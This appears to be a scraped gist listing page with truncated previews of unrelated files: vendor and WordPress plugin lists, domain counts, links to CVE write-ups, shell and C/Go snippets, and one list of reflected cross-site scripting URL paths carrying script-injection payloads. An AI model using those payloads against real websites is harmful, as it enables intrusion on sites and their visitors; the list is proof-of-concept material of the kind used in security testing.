This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1Password - All | |
2Bleftsparks - All | |
2n - All | |
3CX - All | |
3M Health Information Systems - CGS | |
7-Zip - All | |
7Signal - Sapphire | |
ABB - Alarminsight Cloud | |
ABB - B&R Products | |
ABB - Remote Service |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
5,000,000+ : wpforms-lite | |
5,000,000+ : wordpress-seo | |
5,000,000+ : woocommerce | |
5,000,000+ : really-simple-ssl | |
5,000,000+ : jetpack | |
5,000,000+ : elementor | |
5,000,000+ : contact-form-7 | |
5,000,000+ : classic-editor | |
5,000,000+ : akismet | |
4,000,000+ : wordpress-importer |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2 - 01.org | |
1 - 06bv6fa68lc8dljc3a5rv1h8tgo79oq6.ig.ig.gmodules.com | |
1 - 0cf.io | |
1 - 1001freefonts.com | |
1 - 1032155592.log.optimizely.com | |
1 - 1034291028.log.optimizely.com | |
1 - 106124109.log.optimizely.com | |
2 - 107098409.log.optimizely.com | |
3 - 1096093.log.optimizely.com | |
1 - 111chophouse.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVEs: | |
• http://blog.ptsecurity.com/2020/03/cve-2019-18683-exploiting-linux-kernel.html | |
Exploiting a Linux kernel vuln. in the V4L2 subsystem (CVE-2019-18683). | |
• https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html | |
Turning \x00\x00 into 10000$ (CVE-2021-22555). | |
• https://coreruleset.org/20210630/cve-2021-35368-crs-request-body-bypass/ | |
CRS Request Body Bypass (CVE-2021-35368). |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/search?keyword='></script>"><script>prompt(1)</script> | |
/topsongs.php?Worship="></script><svg/onload=alert(1)>&cat="></script><svgonload=alert(1)> | |
/sendss/!instep.program_locator?pDist=15&pZip="><imgsrc=xonerror=prompt(1) | |
/search.html?search='></script>"><script>prompt(1)</script> | |
/moduleslist.jsp?municipality=<Scriptsrc=1.js></script> | |
/arama/?kelime='></script>"><script>prompt(1)</script>&tarihlers'></script>"><script>prompt(1)</script> | |
/comics/creators/9565/tom_defalco?byZone=**///);alert('OPENBUGBOUNTY');/** | |
/saus/ws/facebookshare/fb.php?action=facebookshare&facebookdescription=Brennpunktharfulgtseksunge | |
/?p=virtualtours.asp&search=address&vtonly=true&hidesrchbtns=true&ic="></form><SCRipt>alertwft8rs4skn')</scrIpT> | |
/plugins/kalendarz.php?apgroup='></span><script>alert(/cranelab/)</script>&lang=pl&sat=2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function extract() { | |
if [ $# -ne 1 ]; then | |
echo "Usage: $FUNCNAME filename" | |
fi | |
filename=$1 | |
if [ -f $filename ]; then | |
case $filename in | |
*.tar.xz) tar xvfJ "$filename" ;; | |
*.tar.gz) tar --gzip -xvf "$filename" ;; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdio.h" | |
#include "stdlib.h" | |
#include "unistd.h" | |
char h[]= | |
" H a c k e r s # M ovie#Script+nTyped#by#Lo#Wang+nCode# b y # l o r d n i k o n / D e ka dence#( 201 4 / 1 0 / 0 7 ) + n+ n + n + t + t # # # # # U N I T E D #ARTIS TS #P IC TUR E S = + t +t + t## ## #prese n " \ | |
" t s = + t + t # # # ####an#IAIN#SOFTLEY#film=+t+t+t####HACKE R S = +t+ t+ t# J O N N Y# L E E # M I LLE R=+t+t+t# #AN GE L I N A # J O L IE = + t + t + t # # F I S H E R # S T E V E N S = |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import "fmt" | |
func main() { | |
var 事 uint = 1 | |
左 := 事 << 事 | |
右 := 事 >> 事 | |
あ := []byte{ | |
byte(事<<(事<<(左)+左) + 事<<(左) + 左), |